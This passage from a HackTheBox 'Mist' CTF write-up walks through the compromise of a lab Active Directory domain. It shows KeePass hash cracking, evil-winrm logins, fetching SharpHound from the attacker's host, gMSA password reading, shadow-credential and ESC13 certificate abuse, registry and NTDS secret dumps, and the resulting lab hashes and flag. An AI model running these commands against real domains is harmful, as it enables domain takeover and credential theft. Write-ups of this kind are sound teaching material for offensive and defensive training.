➜ .\hashcat.exe -a 3 -m 13400 --increment --increment-min 14 --increment-max 20 hashes 'UA7cpa[#1!_*ZX?a?a?a?a?a?a'
...
$keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa929f494a285e48a70b719b280200793ee67*761ad6f646fff6f41a844961b4cc815dc4cd0d58715208115f51dd1a5972f6c55*6520725ffa21f113d82f5240f3be21b6*ce6d93ca81cb7f1918210d0752878186b9e8965adef69a2a896456680b532162*dda750ac8a3355d8831f62e1e4e99970f6bfe6b7d2b6d429ed7b6aca28d3174dc:UA7cpa[#1!_*ZX@

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13400 (KeePass 1 (AES/Twofish) and KeePass 2 (AES))
Hash.Target......: $keepass$*2*60000*0*ae4c58b24d564cf7e40298f973bfa92...3174dc
...
Guess.Mask.......: UA7cpa[#1!_*ZX?a [15]
Guess.Queue......: 2/7 (28.57%) 
...
Started: Thu Jul 18 22:29:52 2024
Stopped: Thu Jul 18 22:30:35 2024

Keepass password: UA7cpa[#1!_*ZX@

Use KeePassXC for Linux.

Writeup-15.png

The password for operative account is ImTiredOfThisJob:(

Sharon.Mullard username fails to authenticate

└─$ proxychains evil-winrm -i 192.168.100.100 -u 'Sharon.Mullard' -p 'ImTiredOfThisJob:('

There was another user with same name in net user /domain which had op_ prefix to current user:

└─$ proxychains evil-winrm -i 192.168.100.100 -u 'op_Sharon.Mullard' -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> whoami /all
User Name              SID
====================== ==============================================
mist\op_sharon.mullard S-1-5-21-1045809509-3006658589-2426055941-1122

Group Name                                  Type             SID                                            Attributes
=========================================== ================ ============================================== ==================================================
Everyone                                    Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access     Alias            S-1-5-32-574                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MIST\Operatives                             Group            S-1-5-21-1045809509-3006658589-2426055941-1121 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

Creds: op_Sharon.Mullard:ImTiredOfThisJob:(

Privilege Escalation (DC01 Administrator)

op_Sharon.Mullard has nothing in home directory. Users:

*Evil-WinRM* PS C:\Users> ls
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/20/2024   5:56 AM                Administrator
d-----         2/21/2024   8:12 AM                Brandon.Keywarp
d-----         2/21/2024   7:40 AM                op_Sharon.Mullard
d-r---         1/26/2024   1:03 PM                Public

Get information about domain:

*Evil-WinRM* PS C:\Users\op_Sharon.Mullard> cd $ENV:TEMP
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> iwr 10.10.14.73/SharpHound.exe -o sh.exe
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> .\sh.exe -c all --zipfilename sh.zip
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\AppData\Local\Temp> download 20240718115608_sh.zip

ReadGMSAPassword (svc_ca$)

Get Outbound Object Control of user:

Writeup-16.png

Looks like we are dealing with certificates again, but we have ReadGMSAPassword on svc_ca$

Writeup-17.png

Writeup-18.png

NetExec: Dump gMSA

└─$ proxychains netexec ldap 192.168.100.100 -u op_Sharon.Mullard -p 'ImTiredOfThisJob:(' --gmsa
SMB         192.168.100.100 445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:mist.htb) (signing:True) (SMBv1:False)
LDAPS       192.168.100.100 636    DC01             [+] mist.htb\op_Sharon.Mullard:ImTiredOfThisJob:(
LDAPS       192.168.100.100 636    DC01             [*] Getting GMSA Passwords
LDAPS       192.168.100.100 636    DC01             Account: svc_ca$              NTLM: 132af7136478f26a1b227d08a508a526

Writeup-19.png

AddKeyCredentialLink (svc_backup)

We can Abuse the AddKeyCredentialLink permission on svc_cabackup user

Writeup-20.png

└─$ proxychains python pywhisker.py -d 192.168.100.100 -u 'svc_ca$' -H '132af7136478f26a1b227d08a508a526' --target 'svc_cabackup' --action add
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:389  ...  OK
[*] Searching for the target account
[*] Target user found: CN=svc_cabackup,CN=Users,DC=mist,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 6529feae-d331-b3d6-504e-1c67adf602a6
[*] Updating the msDS-KeyCredentialLink attribute of svc_cabackup
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: z57wJR9G.pfx
[*] Must be used with password: LD1p4LICqueoUPg83OFA
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
└─$ certipy-ad cert -pfx z57wJR9G.pfx -password 'LD1p4LICqueoUPg83OFA' -export -out svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing PFX to 'svc_cabackup.pfx'
└─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -username 'svc_cabackup' -domain mist.htb -dc-ip 192.168.100.100
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Could not find identification in the provided certificate
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  192.168.100.100:88  ...  OK
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Hmm... Still can't authenticate with evil-winrm

Writeup-21.png

Writeup-22.png

Tried enumerating for vulnerable certificates, but nothing right off the bat.

└─$ proxychains certipy-ad find -username 'svc_cabackup@mist.htb' -dc-ip 192.168.100.100 -vulnerable -hashes ':c9872f1bc10bdd522c12fc2ac9041b64'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 14 enabled certificate templates
[*] Trying to get CA configuration for 'mist-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'mist-DC01-CA' via CSRA: Cant find a valid stringBinding to connect
[*] Trying to get CA configuration for 'mist-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'mist-DC01-CA'
[*] Saved BloodHound data to '20240718171248_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[*] Saved text output to '20240718171248_Certipy.txt'
[*] Saved JSON output to '20240718171248_Certipy.json'

ESC13 Abuse

Writeup-23.png

In our case, the template ManagerAuthentication meets these requirements. We can check the conditions manually or use some scan tools like a patched branch for Certipy to verify this vulnerability.First, we use the account svc_cabackup along with its NTLM hash to request a new certificate of template ManagerAuthentication against mist-DC01-CA

We get an error when requesting a certificate:

└─$ proxychains certipy-ad req -u svc_cabackup -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template ManagerAuthentication -dc-ip 192.168.100.100 -dns-tcp -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80094811 - CERTSRV_E_KEY_LENGTH - The public key does not meet the minimum size required by the specified certificate template.
[*] Request ID is 61
Would you like to save the private key? (y/N)
[-] Failed to request certificate

Default key length by certipy is 2048: -key-size RSA key length > Length of RSA key. Default: 2048

└─$ proxychains certipy-ad req -u svc_cabackup -hashes c9872f1bc10bdd522c12fc2ac9041b64 -ca 'mist-DC01-CA' -template ManagerAuthentication -dc-ip 192.168.100.100 -dns-tcp -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[+] Connected to endpoint: ncacn_np:192.168.100.100[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 66
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

└─$ proxychains certipy-ad auth -pfx svc_cabackup.pfx -username 'svc_cabackup' -domain mist.htb -dc-ip 192.168.100.100
[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

Now as user svc_cabackup, who just enrolled to ManagerAuthentication, we have become the Certificate Managers of the server. And we are now able to use template BackupSvcAuthentication which grants enrollment rights to MIST\CA Backup, which we figured it out through the adPEAS enumeration and BloodHound.

Keep climbing up the tower, we pivot to request a certificate using the template BackupSvcAuthentication as the Certificate Manager:

└─$ KRB5CCNAME=svc_cabackup.ccache proxychains -q certipy-ad req -k -no-pass -ca 'mist-DC01-CA' -template 'BackupSvcAuthentication' -dc-ip dc01.mist.htb -ns 192.168.100.100 -dns-tcp  -key-size 4096
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[!] Target name (-target) not specified and Kerberos or SSPI authentication is used. This might fail
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 69
[*] Got certificate with UPN 'svc_cabackup@mist.htb'
[*] Certificate object SID is 'S-1-5-21-1045809509-3006658589-2426055941-1135'
[*] Saved certificate and private key to 'svc_cabackup.pfx'

Note: For some reason 192.168.100.101 didn't work instead of dc01.mist.htb even tho it resolves to same thing..

We will receive a new PFX certificate using the template BackupSvcAuthentication, which we can later use this private key to execute backup operations:

Repeat the attack, authenticate the new PFX certificate against DC01:

└─$ proxychains -q certipy-ad auth -dc-ip 192.168.100.100 -pfx svc_cabackup.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: svc_cabackup@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'svc_cabackup.ccache'
[*] Trying to retrieve NT hash for 'svc_cabackup'
[*] Got hash for 'svc_cabackup@mist.htb': aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64

We will retrieve a new TGT providing backup privilege (same NTLM hash for the same user).

Registry Dump

With this TGT we can perform backup operation for the system. Simply use impacket-reg to dump the registry hives (SAM, SYSTEM, SECURITY):

└─$ export KRB5CCNAME=svc_cabackup.ccache
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\SAM -o 'C:\Users\op_Sharon.Mullard\Documents'
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\system -o 'C:\Users\op_Sharon.Mullard\Documents'
proxychains -q impacket-reg 'mist.htb/svc_cabackup@dc01.mist.htb' -k -no-pass -dc-ip 192.168.100.100 save -keyName HKLM\\security -o 'C:\Users\op_Sharon.Mullard\Documents'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to C:\Users\op_Sharon.Mullard\Documents\SAM.save
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\system to C:\Users\op_Sharon.Mullard\Documents\system.save
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\security to C:\Users\op_Sharon.Mullard\Documents\security.save

└─$ proxychains -q evil-winrm -i 192.168.100.100 -u 'op_Sharon.Mullard' -p 'ImTiredOfThisJob:('
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download SAM.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download security.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> download system.save
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> exit

SAM Dump From Registry

Dump the hashes from registry hives:

└─$ impacket-secretsdump -sam SAM.save -system system.save -security security.save local
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x47c7c97d3b39b2a20477a77d25153da5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5e121bd371bd4bbaca21175947013dd7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesnt have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:c68cb851aa6312ad86b532db8103025cb80e69025bd381860316ba55b056b9e1248e7817ab7fc5b23c232a5bd2aa5b8515041dc3dc47fa4e2d4c34c7db403c7edc4418cf22a1b8c2c544c464ec9fedefb1dcdbebff68c6e9a103f67f3032b68e7770b4e8e22ef05b29d002cc0e22ad4873a11ce9bac40785dcc566d38bb3e2f0d825d2f4011b566ccefdc55f098c3b76affb9a73c6212f69002655dd7b774673bf8eecaccd517e9550d88e33677ceba96f4bc273e4999bbd518673343c0a15804c43fde897c9bd579830258b630897e79d93d0c22edc2f933c7ec22c49514a2edabd5d546346ce55a0833fc2d8403780
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260 # <--
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc78bf46f3d899c3922815140240178912cb2eb59
dpapi_userkey:0xc62a01b328674180712ffa554dd33d468d3ad7b8
[*] NL$KM
 0000   C4 C5 BF 4E A9 98 BD 1B  77 0E 76 A1 D3 09 4C AB   ...N....w.v...L.
 0010   B6 95 C7 55 E8 5E 4C 48  55 90 C0 26 19 85 D4 C2   ...U.^LHU..&....
 0020   67 D7 76 64 01 C8 61 B8  ED D6 D1 AF 17 5E 3D FC   g.vd..a......^=.
 0030   13 E5 4D 46 07 5F 2B 67  D3 53 B7 6F E6 B6 27 31   ..MF._+g.S.o..'1        #'
NL$KM:c4c5bf4ea998bd1b770e76a1d3094cabb695c755e85e4c485590c0261985d4c267d7766401c861b8edd6d1af175e3dfc13e54d46075f2b67d353b76fe6b62731
[*] Cleaning up...

However, the hashes extracted from the local SAM (Security Accounts Manager) database can generally be used to authenticate locally but may not be sufficient for remote logons, especially they do not provide domain-level credentials or permissions. And Microsoft has a policy of Blocking Remote Use of Local Accounts.

But we can always use the hashes for the domain users in such cases, because they're dumped by the cached domain logon information. And the machine account hash (e.g., DC01$) is more powerful as it can authenticate with the domain controller, allowing access to domain resources.

SAM Dump From Local Account NTLM

Therefore, after extracting the machine account hash, we can use it to generate a Kerberos ticket, or re-dump the secrets with the DC01$ hash:

└─$ proxychains -q impacket-secretsdump 'mist.htb/dc01$@dc01.mist.htb' -hashes ':e768c4cf883a87ba9e96278990292260' -target-ip dc01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b46782b9365344abdff1a925601e0385:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:298fe98ac9ccf7bd9e91a69b8c02e86f:::
Sharon.Mullard:1109:aad3b435b51404eeaad3b435b51404ee:1f806175e243ed95db55c7f65edbe0a0:::
Brandon.Keywarp:1110:aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1d07082740626cc9:::
Florence.Brown:1111:aad3b435b51404eeaad3b435b51404ee:9ee69a8347d91465627365c41214edd6:::
Jonathan.Clinton:1112:aad3b435b51404eeaad3b435b51404ee:165fbae679924fc539385923aa16e26b:::
Markus.Roheb:1113:aad3b435b51404eeaad3b435b51404ee:74f1d3e2e40af8e3c2837ba96cc9313f:::
Shivangi.Sumpta:1114:aad3b435b51404eeaad3b435b51404ee:4847f5daf1f995f14c262a1afce61230:::
Harry.Beaucorn:1115:aad3b435b51404eeaad3b435b51404ee:a3188ac61d66708a2bd798fa4acca959:::
op_Sharon.Mullard:1122:aad3b435b51404eeaad3b435b51404ee:d25863965a29b64af7959c3d19588dd7:::
op_Markus.Roheb:1123:aad3b435b51404eeaad3b435b51404ee:73e3be0e5508d1ffc3eb57d48b7b8a92:::
svc_smb:1125:aad3b435b51404eeaad3b435b51404ee:1921d81fdbc829e0a176cb4891467185:::
svc_cabackup:1135:aad3b435b51404eeaad3b435b51404ee:c9872f1bc10bdd522c12fc2ac9041b64:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:e768c4cf883a87ba9e96278990292260:::
MS01$:1108:aad3b435b51404eeaad3b435b51404ee:a71b31073d75b3832c1eb3026fb12d48:::
svc_ca$:1124:aad3b435b51404eeaad3b435b51404ee:34956e4924985c2f1b7ba808cd54bcb8:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:223c1b3a34e024798181df5812ff08617c8a874473002ca892f5f3312a0367d2
Administrator:aes128-cts-hmac-sha1-96:98610a32239f909d2dd7191a0b200af3
Administrator:des-cbc-md5:89e007fbc8197319
krbtgt:aes256-cts-hmac-sha1-96:1f8d633a6aca948f3cfe1ae103ef2245825dc2f16ed171823ac817c097aea0f1
krbtgt:aes128-cts-hmac-sha1-96:d746342824512200d29d504b040e150b
krbtgt:des-cbc-md5:4923193b1c981332
Sharon.Mullard:aes256-cts-hmac-sha1-96:46f1b3a696d5ce7194654e1ee205e05e5fc40fc6726232494d50172697404f59
Sharon.Mullard:aes128-cts-hmac-sha1-96:ce1d4f67122df39096a0304087a37af9
Sharon.Mullard:des-cbc-md5:1a7f4054163d7580
Brandon.Keywarp:aes256-cts-hmac-sha1-96:5b6d15db9b7d5a87e6fab031a46dc560df979523edf72109a33dbee4c9023e2a
Brandon.Keywarp:aes128-cts-hmac-sha1-96:c94f80b1f0f52971bc210cb7fa08e548
Brandon.Keywarp:des-cbc-md5:80757608c7fef2ec
Florence.Brown:aes256-cts-hmac-sha1-96:30edaa3ce504213f32a4ea4b4ee209788bc022d2702f45e512b8d552b530d9f3
Florence.Brown:aes128-cts-hmac-sha1-96:68085dd2a95d4ead421af52312472061
Florence.Brown:des-cbc-md5:ce7508bc0e7998ab
Jonathan.Clinton:aes256-cts-hmac-sha1-96:ac2f7bfaee93c245ebbd9959fa420c32b1d69780560c8a23c605eb47e5d6cc46
Jonathan.Clinton:aes128-cts-hmac-sha1-96:467238a4a231a28930e412d27ed8b09a
Jonathan.Clinton:des-cbc-md5:087c674fcdf1bf8f
Markus.Roheb:aes256-cts-hmac-sha1-96:48553e83896443f93aa77b0f280407f02d0a13da45c2c39598fb0fa298c17043
Markus.Roheb:aes128-cts-hmac-sha1-96:e48c992fe7678056ac85e0fe169c02c5
Markus.Roheb:des-cbc-md5:7940c4c8259b1af7
Shivangi.Sumpta:aes256-cts-hmac-sha1-96:4b6f0e6c634bdc4dad3b91b42fec80135c5520f49aa7f7d541d27aacfce21d89
Shivangi.Sumpta:aes128-cts-hmac-sha1-96:25fba62098625aecfe9f335aa71a01cb
Shivangi.Sumpta:des-cbc-md5:c24fa21ccb91aba1
Harry.Beaucorn:aes256-cts-hmac-sha1-96:f85edbb56f68155fb8b45360ba2e67cbe67893c8875d7ae1ea2a54085f082a73
Harry.Beaucorn:aes128-cts-hmac-sha1-96:e21bf6bd700e77fdea81121431629f4c
Harry.Beaucorn:des-cbc-md5:ab7c137ad364e66e
op_Sharon.Mullard:aes256-cts-hmac-sha1-96:14457283d779320d1bf9e003ee084c9f70d8fec7324345ac15d16241c512299f
op_Sharon.Mullard:aes128-cts-hmac-sha1-96:c439ce69fb34c7b2c693cd11dabd2488
op_Sharon.Mullard:des-cbc-md5:8cc158f8527585ba
op_Markus.Roheb:aes256-cts-hmac-sha1-96:630b8034289cce271b529607039bff05635578b555f055e15398e90665a3a91b
op_Markus.Roheb:aes128-cts-hmac-sha1-96:48f2924abb1cdbe2b029a679b9f95e2c
op_Markus.Roheb:des-cbc-md5:3876f7baa1e97932
svc_smb:aes256-cts-hmac-sha1-96:ab6fd9c7fb1497cd70e54fbe3e763cfac26fa660ceee14492736c6c183b74e37
svc_smb:aes128-cts-hmac-sha1-96:a8626be32fc03eff20e28b11101cd262
svc_smb:des-cbc-md5:b0f8bfb5e6ea0431
svc_cabackup:aes256-cts-hmac-sha1-96:7bb6d62ae4d9438ed967ac87ebe16c00ed8eec1d2ef6979288ad16a0ef9d1dd4
svc_cabackup:aes128-cts-hmac-sha1-96:f85ae26f1f4f33686293221872fef92a
svc_cabackup:des-cbc-md5:4a7504e5341910df
DC01$:aes256-cts-hmac-sha1-96:a47600b1ff206958b49938fdff101d4444253de01f595c7fe1a5276e4265c245
DC01$:aes128-cts-hmac-sha1-96:7043bf9b8bf4e5886058da7defab4581
DC01$:des-cbc-md5:07fef70d97161502
MS01$:aes256-cts-hmac-sha1-96:d1e07f5b55c68265592ed116b93d74adaa249a0532cd16cd26cf635a0f5a51c2
MS01$:aes128-cts-hmac-sha1-96:8d337c5e2b00d1814d86dc3b35c145ed
MS01$:des-cbc-md5:4a46dc26bcecc87f
svc_ca$:aes256-cts-hmac-sha1-96:2d5ff8ab94be218fcad8da7b257ac7f7693d4bb80ae024d7da54a47ed6dec6a3
svc_ca$:aes128-cts-hmac-sha1-96:0757a2673553767bb615b13214652b9d
svc_ca$:des-cbc-md5:b3439497cef2f82c
[*] Cleaning up...

Admin Auth On DC01

└─$ proxychains -q evil-winrm -i 192.168.100.100 -u 'Administrator' -H 'b46782b9365344abdff1a925601e0385'
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> tree /f /a
Folder PATH listing
Volume serial number is 169A-FA3E
C:.
+---Desktop
|       root.txt
+---Documents
|   \---WindowsPowerShell
|       \---Scripts
|           \---InstalledScriptInfos
+---Downloads
+---Music
|       cleanup.ps1
|       flagrotate.ps1
|       startup.ps1
|       whisker.exe

Root.txt

*Evil-WinRM* PS C:\Users\Administrator> cat Desktop/root.txt
bd07f9a54257844a9fac9d5ade582810

Admin Scripts

*Evil-WinRM* PS C:\Users\Administrator\music> cat cleanup.ps1
C:\users\administrator\music\whisker.exe clear /target:ms01$
C:\users\administrator\music\whisker.exe add /target:ms01$

*Evil-WinRM* PS C:\Users\Administrator\music> cat flagrotate.ps1
Enable-VMIntegrationService -Name "Guest Service Interface" -VMName "MS01"
Copy-VMFile -VMName 'MS01' -SourcePath "C:\Users\brandon.keywarp\Desktop\user.txt" -DestinationPath "C:\Users\Administrator\Desktop\user.txt" -FileSource Host -Force

*Evil-WinRM* PS C:\Users\Administrator\music> cat startup.ps1
$vm_name = "MS01"
get-vm -name $vm_name | Stop-VM
Set-VMProcessor $vm_name -CompatibilityForMigrationEnabled $true
Start-VM -name $vm_name

References

• Writeups:

  1. https://blog.csdn.net/m0_52742680/article/details/137227102

  2. https://miranda-bai.github.io/HTB/Machines/Mist/

  3. https://manesec.github.io/2024/04/05/2024-htb-machine/13-Mist/

  4. https://darkwing.moe/2024/04/05/Mist-HackTheBox/

  5. https://4xura.com/ctf/htb-writeup-mist/

• Resources:

  1. Exploiting CVE-2022-26923 by Abusing AD CS | TryHackMe

  2. THM: CVE-2022-26923

  3. THM: AD Certificate Templates

  4. Hello: I’m your ADCS server and I want to authenticate against you

  5. HTB: Escape

  6. Certified Pre-Owned

  7. PetitPotam | NTLM Relay Attacks | AD CS | Mimikatz | Rubeus | Domain Takeover

  8. Detecting shadow credentials

  9. NTLM vs Kerberos Authentication

  10. Relaying credentials everywhere with ntlmrelayx

  11. Abuse of ADCS for privilege escalation - ESC13 detailed explanation

  12. HackerRecipies: Certificate templates

  13. Abuse of ADCS for privilege escalation - ESC13 detailed explanation

  14. SpecterOps: ADCS ESC13 Abuse Technique

  15. Microsoft: Blocking Remote Use of Local Accounts

• Admin Hash:

  1. jadu101: Hackthebox📦 ❯ Windows📘 ❯ HTB-Mist

  2. b46782b9365344abdff1a925601e0385